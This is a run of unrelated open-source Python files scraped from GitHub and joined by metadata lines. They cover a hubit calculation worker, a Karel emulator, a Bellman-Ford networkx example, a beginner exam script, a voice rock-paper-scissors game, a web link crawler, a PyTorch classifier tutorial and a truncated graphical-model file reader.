caching\n self._did_start = False\n\n # Store information on how results were created (calculation or cache)\n self._results_from = self.RESULTS_FROM_UNKNOWN\n\n if dryrun:\n # If worker should perform a dry run set the worker function to \"_work_dryrun\"\n self.workfun = self._work_dryrun\n else:\n self.workfun = self._work\n\n # Paths for values that are consumed but not ready\n self.pending_input_paths: List[HubitQueryPath] = []\n self.pending_results_paths: List[HubitQueryPath] = []\n\n # Stores required values using internal names as keys\n self.inputval_for_name: Dict[str, Any] = {}\n self.resultval_for_name: Dict[str, Any] = {}\n\n # Stores required values using internal names as keys\n self.inputval_for_path: Dict[HubitQueryPath, Any] = {}\n self.resultval_for_path: Dict[HubitQueryPath, Any] = {}\n\n # Which indices are specified for each index ID\n self.idxval_for_idxid = {}\n\n # To store provided results. 
Values stores with the internal\n # name specified in the model as the key\n self.results: Dict[str, Any]\n if manager is None:\n self.results = {}\n self._did_complete = False\n self.use_multiprocessing = False\n else:\n self.results = manager.dict()\n self._did_complete = Value(c_bool, False)\n self.use_multiprocessing = True\n\n # TODO\n # 1) Prune tree corresponding to query\n # 2) Prune remaining trees based idxval_for_idxid (method does no exist yet on LengthTree)\n\n # Creating self.idxval_for_idxid from \"provides_results\" assumes that\n # the providers have all index identifiers from \"consumes_input\" and\n # \"consumes_results\" defined excluding the ones that have a range = \":\".\n # This is reasonable since this assures that there is a well-defined place to\n # store the results.\n if self.component.does_provide_results():\n self.rpath_provided_for_name, self.idxval_for_idxid = _Worker.get_bindings(\n self.component.provides_results, query\n )\n self.provided_mpath_for_name = self.component.binding_map(\n \"provides_results\"\n )\n else:\n self.provided_mpath_for_name = None\n raise HubitWorkerError(\"No provider for Hubit model component '{self.id}'\")\n\n # Model path for input dependencies with ilocs from query\n if self.component.does_consume_input():\n self.ipath_consumed_for_name = _Worker.bindings_from_idxs(\n self.component.consumes_input, self.idxval_for_idxid\n )\n # Allow model path lookup by internal name\n iconsumed_mpath_for_name = self.component.binding_map(\"consumes_input\")\n else:\n self.ipath_consumed_for_name = {}\n iconsumed_mpath_for_name = {}\n\n # Model path for results dependencies with ilocs from query\n if self.component.does_consume_results():\n self._consumes_input_only = False\n self.rpath_consumed_for_name = _Worker.bindings_from_idxs(\n self.component.consumes_results, self.idxval_for_idxid\n )\n rconsumed_mpath_for_name = self.component.binding_map(\"consumes_results\")\n else:\n self._consumes_input_only = True\n self.rpath_consumed_for_name = {}\n rconsumed_mpath_for_name = {}\n\n self._id = self.idstr()\n\n # Expand model paths containing iloc wildcards\n if not tree_for_idxcontext == {}:\n self.ipaths_consumed_for_name = _Worker.expand(\n self.ipath_consumed_for_name,\n tree_for_idxcontext,\n iconsumed_mpath_for_name,\n )\n\n self.rpaths_consumed_for_name = _Worker.expand(\n self.rpath_consumed_for_name,\n tree_for_idxcontext,\n rconsumed_mpath_for_name,\n )\n\n self.rpaths_provided_for_name = _Worker.expand(\n self.rpath_provided_for_name,\n tree_for_idxcontext,\n self.provided_mpath_for_name,\n )\n\n self.iname_for_path = {\n path: key\n for key, paths in self.ipaths_consumed_for_name.items()\n for path in traverse(paths)\n }\n\n self.rname_for_path = {\n path: key\n for key, paths in self.rpaths_consumed_for_name.items()\n for path in traverse(paths)\n }\n\n logging.info(f'Worker \"{self.id}\" was created for query \"{self.query}\"')\n\n @property\n def status(self):\n return \"Not implemented\"\n\n @staticmethod\n def bindings_from_idxs(bindings: List[HubitBinding], idxval_for_idxid) -> Dict:\n \"\"\"\n replace index IDs with the actual indices\n if idxid from binding path not found in idxval_for_idxid it\n must correspond to a IDX_WILDCARD in the binding path.\n IDX_WILDCARD ignored in set_ilocs_on_path. 
Dealt with in expansion\n\n Returns path for name\n \"\"\"\n if len(idxval_for_idxid) == 0:\n return {binding.name: binding.path for binding in bindings}\n else:\n result = {}\n for binding in bindings:\n indices = []\n for model_index_spec in binding.path.get_index_specifiers():\n idxid = model_index_spec.identifier\n range = model_index_spec.range\n offset = model_index_spec.offset\n\n index: Optional[str]\n if range.is_digit:\n # already an index so no transformation required\n index = str(range)\n elif range.is_empty:\n # Map index ID to the value\n index = str(int(idxval_for_idxid[idxid]) + offset)\n elif range.is_full_range:\n # leave for subsequent expansion.\n # From the expansion method's perspective 'index' could be any character.\n index = range\n else:\n raise HubitError(f\"Unknown range '{range}'\")\n indices.append(ModelIndexSpecifier.from_components(idxid, index))\n\n result[binding.name] = binding.path.set_indices(indices, mode=1)\n return result\n\n @staticmethod\n def get_bindings(bindings: List[HubitBinding], query_path: HubitQueryPath):\n \"\"\"Make symbolic binding specific i.e. replace index IDs\n with actual indices based on query\n\n Args:\n bindings: List of bindings\n query_path: Query path\n\n Raises:\n HubitWorkerError: Raised if query does not match any of the bindings\n or if query is not expanded\n\n Returns:\n [type]: TODO [description]\n \"\"\"\n if query_path.wildcard_chr in query_path:\n raise HubitWorkerError(\n f\"Query path '{query_path}' contains illegal character '{query_path.wildcard_chr}'. Should already have been expanded.\"\n )\n\n binding_paths = [binding.path for binding in bindings]\n # Get indices in binding_paths list that match the query\n idxs_match = query_path.idxs_for_matches(binding_paths)\n if len(idxs_match) == 0:\n fstr = 'Query \"{}\" did not match attributes provided by worker ({}).'\n raise HubitWorkerError(fstr.format(query_path, \", \".join(binding_paths)))\n\n # Get the location indices from query. 
Using the first binding path that\n # matched the query suffice\n idxval_for_idxid = {}\n for binding in bindings:\n if query_path.path_match(binding.path):\n identifiers = binding.path.get_index_identifiers()\n ranges = query_path.ranges()\n idxval_for_idxid.update(dict(zip(identifiers, ranges)))\n break\n\n path_for_name = _Worker.bindings_from_idxs(bindings, idxval_for_idxid)\n\n return path_for_name, idxval_for_idxid\n\n @staticmethod\n def expand(path_for_name, tree_for_idxcontext, model_path_for_name):\n paths_for_name = {}\n for name, path in path_for_name.items():\n tree = tree_for_idxcontext[model_path_for_name[name].index_context]\n pruned_tree = tree.prune_from_path(path, inplace=False)\n paths_for_name[name] = pruned_tree.expand_path(path)\n return paths_for_name\n\n def consumes_input_only(self):\n return self._consumes_input_only\n\n def binding_map(self, binding_type):\n return self.component.binding_map(binding_type)\n\n # def make_map(bindings):\n # return {binding.name: binding.path for binding in bindings}\n\n # if type == \"provides\": # provides is always present in worker\n # return make_map(self.cfg[\"provides\"])\n # elif type in (\"results\", \"input\"):\n # if _Worker.consumes_type(self.cfg, type):\n # return make_map(self.cfg[\"consumes\"][type])\n # else:\n # return {}\n # else:\n # raise HubitWorkerError(f'Unknown type \"{type}\"')\n\n # @staticmethod\n # def consumes_type(cfg: Dict, consumption_type: str) -> bool:\n # \"\"\"Check if configuration (cfg) consumes the \"consumption_type\"\n\n # Args:\n # cfg (Dict): Componet configuration\n # consumption_type (str): The consumption type. Can either be \"input\" or \"results\". Validity not checked.\n\n # Returns:\n # bool: Flag indicating if the configuration consumes the \"consumption_type\"\n # \"\"\"\n # return (\n # \"consumes\" in cfg\n # and consumption_type in cfg[\"consumes\"]\n # and len(cfg[\"consumes\"][consumption_type]) > 0\n # )\n\n def paths_provided(self):\n \"\"\"Generates a list of the (expanded) paths that will be provided.\n\n Returns:\n List: Sequence of paths that will be provided by the worker\n \"\"\"\n return [\n path for paths in self.rpaths_provided_for_name.values() for path in paths\n ]\n\n def result_for_path(self):\n \"\"\"\n Convert the results from internal attribute names to shared data names\n and expand ilocs\n \"\"\"\n\n # TODO: Work only with : and not..... 
but not elegant...\n out = {}\n for name, paths in self.rpaths_provided_for_name.items():\n if len(paths) > 1:\n _out = {\n path: val\n for path, val in zip(traverse(paths), traverse(self.results[name]))\n }\n else:\n _out = {paths[0]: self.results[name]}\n out.update(_out)\n return out\n\n def results_ready(self):\n \"\"\"\n Checks that all attributes provided have been calculated\n \"\"\"\n return set(self.results.keys()) == set(self.rpath_provided_for_name.keys())\n\n def join(self):\n \"\"\"Join process\"\"\"\n if self.job is not None:\n self.job.terminate()\n self.job.join()\n\n def use_cached_result(self, result):\n logging.info(f'Worker \"{self.id}\" using CACHE for query \"{self.query}\"')\n # Set each key-val pair from the cached results to the worker results\n # The worker results may be a managed dict\n for key, val in result.items():\n self.results[key] = val\n self._results_from = self.RESULTS_FROM_CACHE_ID\n\n def _func_wrapped(self, inputval_for_name, results, did_complete):\n self.func(inputval_for_name, results)\n with did_complete.get_lock():\n did_complete.value = Value(c_bool, True)\n self._callback_completed(self)\n\n def _mp_func(self, inputval_for_name):\n self.job = multiprocessing.Process(\n target=self._func_wrapped,\n args=(inputval_for_name, self.results, self._did_complete),\n )\n self.job.daemon = False\n self.job.start()\n\n def _sp_func(self, inputval_for_name):\n self.func(inputval_for_name, self.results)\n self._did_complete = True\n self._callback_completed(self)\n\n def _work_dryrun(self):\n \"\"\"\n Sets all results to None\n \"\"\"\n for name in self.rpath_provided_for_name.keys():\n tree = self.tree_for_idxcontext[\n self.provided_mpath_for_name[name].index_context\n ]\n self.results[name] = tree.none_like()\n\n self._did_complete = True\n self._callback_completed(self)\n\n def _work(self):\n \"\"\"\n Executes actual work\n \"\"\"\n logging.info(f'Worker \"{self.id}\" STARTED for query \"{self.query}\"')\n\n # Notify the hubit model that we are about to start the work\n # create single input\n inputval_for_name = ReadOnlyDict(\n {\n **self.inputval_for_name,\n **self.resultval_for_name,\n }\n )\n if self.use_multiprocessing:\n self._mp_func(inputval_for_name)\n else:\n self._sp_func(inputval_for_name)\n self._results_from = self.RESULTS_FROM_CALCULATION_ID\n\n logging.debug(\"\\n**STOP WORKING**\\n{}\".format(self.__str__()))\n logging.info(f'Worker \"{self.id}\" finished for query \"{self.query}\"')\n\n @staticmethod\n def reshape(path_for_name, val_for_path):\n \"\"\"\n Convert val_for_path to val_for_name i.e.\n from external names to internal names with expected shapes\n \"\"\"\n return {\n name: reshape(path, val_for_path) for name, path in path_for_name.items()\n }\n\n def is_ready_to_work(self):\n return self._consumed_input_ready and self._consumed_results_ready\n\n def _prepare_work(self):\n logging.debug(\"Let the work begin: {}\".format(self.workfun))\n self._consumed_data_set = True\n self._did_start = True\n\n def work(self):\n \"\"\" \"\"\"\n self._prepare_work()\n self.workfun()\n\n def set_results(self, results):\n \"\"\"Set pre-computed results directly on worker.\n Don't wait for input.\n \"\"\"\n self._prepare_work()\n self.use_cached_result(results)\n self._did_complete = True\n self._callback_completed(self)\n\n def set_consumed_input(self, path: HubitQueryPath, value):\n if path in self.pending_input_paths:\n self.pending_input_paths.remove(path)\n self.inputval_for_path[path] = value\n self._consumed_input_ready = 
len(self.pending_input_paths) == 0\n\n # Create inputval_for_name as soon as we can to allow results_id to be formed\n if self._consumed_input_ready:\n self.inputval_for_name = _Worker.reshape(\n self.ipaths_consumed_for_name, self.inputval_for_path\n )\n\n if len(self.pending_input_paths) == 0:\n self.input_checksum = self._input_checksum()\n\n if self.is_ready_to_work():\n self.resultval_for_name = _Worker.reshape(\n self.rpaths_consumed_for_name, self.resultval_for_path\n )\n self.results_checksum = self._results_checksum()\n self._callback_ready(self)\n\n # if not self.caching:\n # self.work_if_ready()\n\n def set_consumed_result(self, path, value):\n if path in self.pending_results_paths:\n self.pending_results_paths.remove(path)\n self.resultval_for_path[path] = value\n\n self._consumed_results_ready = len(self.pending_results_paths) == 0\n\n if self.is_ready_to_work():\n self.resultval_for_name = _Worker.reshape(\n self.rpaths_consumed_for_name, self.resultval_for_path\n )\n self.results_checksum = self._results_checksum()\n\n self._callback_ready(self)\n\n def set_values(self, inputdata, resultsdata: FlatData):\n \"\"\"\n Set the consumed values if they are ready otherwise add them\n to the list of pending items\n \"\"\"\n # Check consumed input (should not have any pending items by definition)\n for path in self.iname_for_path.keys():\n if path in inputdata.keys():\n self.inputval_for_path[path] = inputdata[path]\n else:\n self.pending_input_paths.append(path)\n\n # Check consumed results\n for path in self.rname_for_path.keys():\n if path in resultsdata.keys():\n self.resultval_for_path[path] = resultsdata[path]\n else:\n self.pending_results_paths.append(path)\n\n self._consumed_input_ready = len(self.pending_input_paths) == 0\n self._consumed_results_ready = len(self.pending_results_paths) == 0\n\n # Create inputval_for_name as soon as we can to allow results_id to be formed\n if self._consumed_input_ready:\n self.inputval_for_name = _Worker.reshape(\n self.ipaths_consumed_for_name, self.inputval_for_path\n )\n self.input_checksum = self._input_checksum()\n\n if self._consumed_results_ready:\n self.resultval_for_name = _Worker.reshape(\n self.rpaths_consumed_for_name, self.resultval_for_path\n )\n self.results_checksum = self._results_checksum()\n\n if self.is_ready_to_work():\n self._callback_ready(self)\n\n return (\n copy.copy(self.pending_input_paths),\n copy.copy(self.pending_results_paths),\n )\n\n def idstr(self):\n \"\"\"\n Make an ID string for the worker class that will be the same\n if all ilocs are the same for the same component\n \"\"\"\n return \"name={} v{} idxs={}\".format(\n self.id,\n self.version,\n \"&\".join([f\"{k}={v}\" for k, v in self.idxval_for_idxid.items()]),\n )\n\n def _input_checksum(self) -> str:\n \"\"\"checksum for the input values\"\"\"\n return hashlib.md5(\n # f'{self.inputval_for_name}_{id(self.func)}'.encode('utf-8')\n json.dumps(\n [\n sorted(self.inputval_for_name.items(), key=itemgetter(0)),\n str(self.component.path),\n self.func.__name__,\n ]\n ).encode()\n ).hexdigest()\n\n def _results_checksum(self) -> str:\n \"\"\"\n We want to know the checksum before the results values are available.\n The results will be identifiable by\n - the worker input (input_checksum)\n - the consumed results\n \"\"\"\n return hashlib.md5(\n json.dumps(\n [\n self.input_checksum,\n sorted(self.resultval_for_name.items(), key=itemgetter(0)),\n ]\n ).encode()\n ).hexdigest()\n\n def __str__(self):\n n = 100\n fstr1 = \"{:30}{}\\n\"\n strtmp = \"=\" * n + 
\"\\n\"\n strtmp += \"ID: {}\\n\".format(self.idstr())\n strtmp += \"Function: {}\\n\".format(self.func)\n strtmp += \"Query: {}\\n\".format(self.query)\n strtmp += \"-\" * n + \"\\n\"\n strtmp += fstr1.format(\"Results provided\", self.rpath_provided_for_name)\n strtmp += fstr1.format(\n \"Results provided expanded\", self.rpaths_provided_for_name\n )\n strtmp += fstr1.format(\"Input consumed\", self.ipath_consumed_for_name)\n strtmp += fstr1.format(\"Input consumed expanded\", self.ipaths_consumed_for_name)\n strtmp += fstr1.format(\"Results consumed\", self.rpath_consumed_for_name)\n strtmp += fstr1.format(\n \"Results consumed expanded\", self.rpaths_consumed_for_name\n )\n\n strtmp += \"-\" * n + \"\\n\"\n strtmp += fstr1.format(\"Input attr values\", self.inputval_for_name)\n strtmp += fstr1.format(\"Input path values\", self.inputval_for_path)\n strtmp += fstr1.format(\"Results attr values\", self.resultval_for_name)\n strtmp += fstr1.format(\"Results path values\", self.resultval_for_path)\n strtmp += fstr1.format(\"Input pending\", self.pending_input_paths)\n strtmp += fstr1.format(\"Results pending\", self.pending_results_paths)\n\n strtmp += \"-\" * n + \"\\n\"\n strtmp += f\"Ready to work: {self.is_ready_to_work()}\\n\"\n strtmp += f\"Did start: {self._did_start}\\n\"\n strtmp += f\"Did complete: {self._did_complete}\\n\"\n strtmp += \"Results {}\\n\".format(self.results)\n strtmp += f\"Results from: {self._results_from}\\n\"\n\n strtmp += \"=\" * n + \"\\n\"\n\n return strtmp\n\n def used_cache(self):\n return self._results_from == self.RESULTS_FROM_CACHE_ID\n","repo_name":"mrsonne/hubit","sub_path":"hubit/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":23071,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"18590427659","text":"import copy\nimport sys\nimport os\n\nclass EmuLocationTuple(object):\n def __init__(self, name, index):\n self.name = name\n self.index = index\n\n def __str__(self):\n return \"{0}:{1}\".format(self.name, self.index)\n\nclass EmuLocation(object):\n def __init__(self, tuples):\n self.tuples = tuples\n\n def add(self, name, index):\n tuples = copy.deepcopy(self.tuples)\n tuples.append(EmuLocationTuple(name, index))\n return EmuLocation(tuples)\n\n def __str__(self):\n return \" \".join([str(x) for x in self.tuples])\n\nclass EmuTick(object):\n def __init__(self, location, type, value):\n self.location = location\n self.type = type\n self.value = value\n\nclass EmuResult(object):\n def __init__(self, status, inpgrid, outgrid, ticks, actions):\n self.status = status\n self.inpgrid = inpgrid\n self.outgrid = outgrid\n self.ticks = ticks\n self.actions = actions\n self.crashed = False\n\nclass FastEmuException(BaseException):\n def __init__(self, status):\n self.status = status\n\nclass EmuState(object):\n def __init__(self, world, max_ticks, max_actions):\n self.world = world\n self.max_ticks = max_ticks\n self.max_actions = max_actions\n self.crashed = False\n self.ticks = []\n self.actions = []\n\n def add_action(self, location, type):\n action_index = len(self.actions)\n self.__add_tick(EmuTick(location, 'action', action_index))\n self.actions.append(type)\n\n def add_condition_tick(self, location, result):\n self.__add_tick(EmuTick(location, 'condition', result))\n\n def add_repeat_tick(self, location, index):\n self.__add_tick(EmuTick(location, 'repeat', index))\n\n def __add_tick(self, tick):\n if self.max_ticks is not None and \\\n self.max_ticks != -1 and \\\n 
len(self.ticks) >= self.max_ticks:\n raise FastEmuException('MAX_TICKS')\n self.ticks.append(tick)\n\n def __add_action(self, action):\n if self.max_actions is not None and \\\n self.max_actions != -1 and \\\n len(self.actions) >= self.max_actions:\n raise FastEmuException('MAX_ACTIONS')\n self.actions.append(action)\n\nclass FastEmulator(object):\n def __init__(self, max_ticks=None, max_actions=None):\n self.max_ticks = max_ticks\n self.max_actions = max_actions\n actions = [\n 'move',\n 'turnLeft',\n 'turnRight',\n 'pickMarker',\n 'putMarker',\n ]\n\n self.action_hash = {}\n for x in actions:\n self.action_hash[x] = 1\n\n conditionals = [\n 'markersPresent',\n 'noMarkersPresent',\n 'leftIsClear',\n 'rightIsClear',\n 'frontIsClear',\n ]\n\n self.conditional_hash = {}\n for x in conditionals:\n self.conditional_hash[x] = 1\n\n def emulate(self, ast, inpgrid):\n j_ast = ast.getJson()\n world = copy.deepcopy(inpgrid)\n state = EmuState(world, self.max_ticks, self.max_actions)\n location = EmuLocation([])\n\n status = 'OK'\n try:\n self.__emulate_block(j_ast, 'run', location, state)\n except FastEmuException as e:\n status = e.status\n\n result = EmuResult(status, inpgrid, state.world, state.ticks, state.actions)\n\n return result\n\n def __emulate_condition(self, condition, location, state):\n result = self.__eval_condition_recursive(condition, state)\n state.add_condition_tick(location, result)\n return result\n\n def __eval_condition_recursive(self, condition, state):\n type = condition['type']\n if type == 'not':\n result = self.__eval_condition_recursive(condition['condition'], state)\n return not result\n if type not in self.conditional_hash:\n raise Exception(\"Type not supported: {0}\".format(type))\n\n if type == 'noMarkersPresent':\n result = not state.world.markersPresent()\n else:\n conditional_func = getattr(state.world, type)\n result = conditional_func()\n return result\n\n def __emulate_block(self, parent, relationship, location, state):\n block = parent[relationship]\n for st_idx, node in enumerate(block):\n child_location = location.add(relationship, st_idx)\n type = node['type']\n if type in self.action_hash:\n action_func = getattr(state.world, type)\n action_func()\n state.add_action(child_location, type)\n if state.world.isCrashed():\n raise FastEmuException('CRASHED')\n elif type == 'repeat':\n times = node['times']\n for i in xrange(times):\n state.add_repeat_tick(child_location, i)\n self.__emulate_block(node, 'body', child_location, state)\n elif type == 'while':\n while True:\n res = self.__emulate_condition(node['condition'], child_location, state)\n if not res:\n break\n self.__emulate_block(node, 'body', child_location, state)\n elif type == 'if':\n if self.__emulate_condition(node['condition'], child_location, state):\n self.__emulate_block(node, 'body', child_location, state)\n elif type == 'ifElse':\n if self.__emulate_condition(node['condition'], child_location, state):\n self.__emulate_block(node, 'ifBody', child_location, state)\n else:\n self.__emulate_block(node, 'elseBody', child_location, state)\n else:\n raise Exception(\"Unknown type: {0}\".format(type))\n","repo_name":"bunelr/GandRL_for_NPS","sub_path":"karel/fast_emulator.py","file_name":"fast_emulator.py","file_ext":"py","file_size_in_byte":5899,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"66"} +{"seq_id":"8384392809","text":"import networkx as nx\n\n# 创建有向图并添加节点、边以及权重(包括负权重)\nG = nx.DiGraph()\n\n# 添加节点和有向边(包括负权重)\nG.add_edges_from([(1, 2, 
{'weight': 2}),\n (1, 3, {'weight': -3}), # 负权重\n (2, 3, {'weight': 1}),\n (2, 4, {'weight': -5}), # 负权重\n (3, 4, {'weight': 3}),\n (3, 5, {'weight': -2}), # 负权重\n (4, 5, {'weight': 2})])\n\n# 指定起始节点和终点节点\nsource = 1\ntarget = 5\n\n# 使用 Bellman-Ford 算法计算特定源点到终点的最短路径\ntry:\n shortest_path_length, shortest_path = nx.single_source_bellman_ford(G, source=source, target=target, weight='weight')\n\n print(f\"Shortest path from {source} to {target}:\")\n print(\"Length:\", shortest_path_length)\n print(\"Path:\", shortest_path)\n\nexcept nx.NetworkXNoPath:\n print(f\"No path from {source} to {target}.\")\nexcept nx.NetworkXUnbounded:\n print(\"Graph contains a negative weight cycle.\")\n","repo_name":"MarsPJ/optimization-model","sub_path":"ShortestPath/Bellman-Ford/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4575769689","text":"#Tiffi Westcott\n#Exam 1: asks for two positive integers and decides which are bigger, resulting in modular division that is spit out to the user. \n\n#Requests two positive integers from user.\nfirstInput = input(\"Enter your first positive integer: \")\n\n#Try - except loops verify inputs are integers.\ntry:\n intInput1 = int(firstInput)\n if intInput1 < 0:\n print (\"That is not a positive integer.\")\nexcept ValueError:\n print (\"The input is not valid.\")\n\n#Requests two positive integers from user.\nsecondInput = input(\"Enter your second positive integer: \")\n\n#Try - except loops verify inputs are integers.\ntry:\n intInput2 = int(secondInput)\n if intInput2 < 0:\n print (\"That is not a positive integer.\")\nexcept ValueError:\n print (\"That's not valid input.\")\n\n#Puts division statements into variables for ease of use.\ndivision1 = intInput1%intInput2\ndivision2 = intInput2%intInput1\n\n#If - elif - else determines which of the numbers are smaller and larger, then prints result statements.\nif intInput1 > intInput2:\n print (\"The number that is larger is: \", repr(intInput1), \"and the number that is smaller is\", repr(intInput2),\".\")\n print (\"The division result is... \", division1,\".\")\nelif intInput2 > intInput1:\n print (\"The number that is larger is: \", repr(intInput2), \"and the number that is smaller is\", repr(intInput1),\".\")\n print (\"The division result is... \", division2,\".\")\nelse:\n print (\"The numbers are both equal: \", intInput1,\".\")\n","repo_name":"t1ffi/python","sub_path":"exam1.py","file_name":"exam1.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19332838074","text":"\"\"\"Rock paper sciccors voice game\"\"\"\n\nimport sys\nfrom random import randint\n\nfrom .aiy.audio import say\nfrom .aiy.cloudspeech import get_recognizer\n\n\ndef rock_paper_scissors() -> None:\n \"\"\"Rock paper scissors game\"\"\"\n recognizer = get_recognizer()\n computer_choice = randint(0, 2)\n choices = [\"rock\", \"scissors\", \"paper\"]\n for choice in choices:\n recognizer.expect_phrase(choice)\n say(\"Ok lets play. 
Say your choice in 3...2...1\")\n text = recognizer.recognize()\n if text is None:\n say(\"Sorry, I did not hear you.\")\n return\n if sys.stdout.isatty():\n print(\"You said:\", text)\n for choice in choices:\n if choice in text:\n player_choice = choices.index(choice)\n break\n if player_choice is None:\n say(\"Sorry, I did not hear you.\")\n return\n say(\"I chose {}\".format(choices[computer_choice]))\n if player_choice == computer_choice:\n say(\"Draw i guess\")\n elif (\n (computer_choice == 0 and player_choice == 2)\n or (computer_choice == 1 and player_choice == 0)\n or (computer_choice == 2 and player_choice == 1)\n ):\n say(\"You Win\")\n else:\n say(\"I Win\")\n","repo_name":"butlerx/assistant","sub_path":"src/games.py","file_name":"games.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21526992992","text":"consumidor = input(\"Digite o tipo de consumiodor: \")\r\n\r\nconsumoEnergia = float(input(\"Digite o consumo: \"))\r\n\r\nif consumidor == \"I\":\r\n calculo = 0.68 * consumoEnergia + 34\r\n \r\nelif consumidor == \"C\":\r\n calculo = 0.37 * consumoEnergia + 45\r\n \r\nelif consumidor == \"R\":\r\n calculo = 0.77 * consumoEnergia - 22\r\n \r\nprint(f\"O valor será de R${calculo}\")\r\n","repo_name":"viniciusxv27/TP_Aula1","sub_path":"lista2/exercicio14.py","file_name":"exercicio14.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"pt","doc_type":"code","stars":4,"dataset":"github-code","pt":"66"} +{"seq_id":"41406708929","text":"import requests\r\nimport time\r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\n\r\nclass crawl_link_web:\r\n\r\n\tdef __init__(self, dom, cate, link):\r\n\r\n\t\tself.dom = dom\r\n\t\tself.cate = cate\r\n\t\tself.link = link\r\n\r\n\tdef getcate(self):\r\n\t\tprint(\"2__\")\r\n\t\t\r\n\t\treq = requests.get(self.dom).text\r\n\t\tsoup = BeautifulSoup(req, \"html.parser\")\r\n\t\tcate =soup.select(self.cate)\r\n\t\tct = []\r\n\r\n\t\tfor c in cate[1:]:\r\n\t\t\tl = c.get(\"href\")\r\n\t\t\tif l.startswith(\"https://\"):\r\n\t\t\t\tct.append(l)\r\n\t\t\t\r\n\t\t\tif l.startswith(\"/\"):\r\n\t\t\t\tct.append(self.dom + l[1:])\r\n\t\t\t\t\r\n\t\treturn ct \r\n\r\n\r\n\tdef getlink(self,ca):\r\n\t\tli = []\r\n\t\ttry:\r\n\t\t\tfor c in ca:\r\n\t\t\t\treq = requests.get(c).text\r\n\t\t\t\tsoup = BeautifulSoup(req, \"html.parser\")\r\n\t\t\t\tlink = soup.select(self.link)\r\n\r\n\t\t\t\tfor i in link: \r\n\t\t\t\t\tl = i.get('href')\r\n\t\t\t\t\tif l.startswith(\"https://\"):\t\r\n\t\t\t\t\t\tli.append(l)\r\n\r\n\t\t\t\t\tif l.startswith(\"/\"): \t\r\n\t\t\t\t\t\tli.append(self.dom + l[1:])\r\n\t\t\t\t\t\t\t\r\n\t\t\treturn li\r\n\t\texcept :\r\n\t\t\tpass\r\n\r\n\r\n","repo_name":"huyphan201/API_rest_test","sub_path":"crawler/crawler_link.py","file_name":"crawler_link.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6763554829","text":"import torch\nimport matplotlib.pyplot as plt\nimport torch.nn.functional as F # 激励函数都在这\n\n# 假数据\nn_data = torch.ones(100, 2) # 数据的基本形态\nx0 = torch.normal(2*n_data, 1) # 类型0 x data (tensor), shape=(100, 2)\ny0 = torch.zeros(100) # 类型0 y data (tensor), shape=(100, 1)\nx1 = torch.normal(-2*n_data, 1) # 类型1 x data (tensor), shape=(100, 2)\ny1 = torch.ones(100) # 类型1 y data (tensor), shape=(100, 1)\n\n# 注意 x, y 数据的数据形式是一定要像下面一样 (torch.cat 是在合并数据)\nx = torch.cat((x0, x1), 0).type(torch.FloatTensor) # 
FloatTensor = 32-bit floating\ny = torch.cat((y0, y1), ).type(torch.LongTensor) # LongTensor = 64-bit integer\n\nprint(x)\nprint(y)\n\nplt.scatter(x.data.numpy()[:, 0], x.data.numpy()[:, 1], c=y.data.numpy(), s=100, lw=0, cmap='RdYlGn')\nplt.show()\n\n\n\nclass Net(torch.nn.Module): # 继承 torch 的 Module\n def __init__(self, n_feature, n_hidden, n_output):\n super(Net, self).__init__() # 继承 __init__ 功能\n # 定义每层用什么样的形式\n self.hidden = torch.nn.Linear(n_feature, n_hidden) # 隐藏层线性输出\n self.predict = torch.nn.Linear(n_hidden, n_output) # 输出层线性输出\n\n def forward(self, x): # 这同时也是 Module 中的 forward 功能\n # 正向传播输入值, 神经网络分析出输出值\n x = F.relu(self.hidden(x)) # 激励函数(隐藏层的线性值)\n x = self.predict(x) # 输出值\n return x\n\nnet = Net(n_feature=2, n_hidden=10, n_output=2)\n\nprint(net) # net 的结构\n\nplt.ion()\nplt.show()\n\n# # optimizer 是训练的工具\noptimizer = torch.optim.SGD(net.parameters(), lr=0.1) # 传入 net 的所有参数, 学习率\nloss_func = torch.nn.CrossEntropyLoss() # 在分类问题上常用的分类器,针对独热编码的误差函数计算\n\nfor t in range(100):\n out = net(x) # 喂给 net 训练数据 x, 输出预测值\n\n loss = loss_func(out, y) # 计算两者的误差\n print(\n 'out:{}\\n'.format(out),\n 'y:{}\\n'.format(y)\n )\n\n optimizer.zero_grad() # 清空上一步的残余更新参数值\n loss.backward() # 误差反向传播, 计算参数更新值\n optimizer.step() # 将参数更新值施加到 net 的 parameters 上\n # 接着上面来\n if t % 2 == 0:\n plt.cla()\n # 过了一道 softmax 的激励函数后的最大概率才是预测值\n # print(torch.max(F.softmax(out), 1))\n prediction = torch.max(F.softmax(out), 1)[1]\n pred_y = prediction.data.numpy().squeeze()\n target_y = y.data.numpy()\n plt.scatter(x.data.numpy()[:, 0], x.data.numpy()[:, 1], c=pred_y, s=100, lw=0, cmap='RdYlGn')\n accuracy = sum(pred_y == target_y)/200. # 预测中有多少和真实值一样\n plt.text(1.5, -4, 'Accuracy=%.2f' % accuracy, fontdict={'size': 20, 'color': 'red'})\n plt.pause(0.1)","repo_name":"wwyf/learn_pytorch","sub_path":"morvan/3-pytorch-classification.py","file_name":"3-pytorch-classification.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"34520890043","text":"from constants import *\nfrom pyGM.filetypes import readUai, readEvidence14 #readFileByTokens\nfrom pyGM.varset_py import Var, VarSet\nfrom pyGM import Factor\nfrom valuation import Valuation\n\n\n########################################################################################################################\n# helper functions\nclass FileReadError(Exception):\n \"\"\"Error while reading an input problem file\"\"\"\n\n\nclass FileWriteError(Exception):\n \"\"\"Error while writing an output problem file\"\"\"\n\n\ndef get_a_line(filename):\n for line in open(filename):\n line_strip = 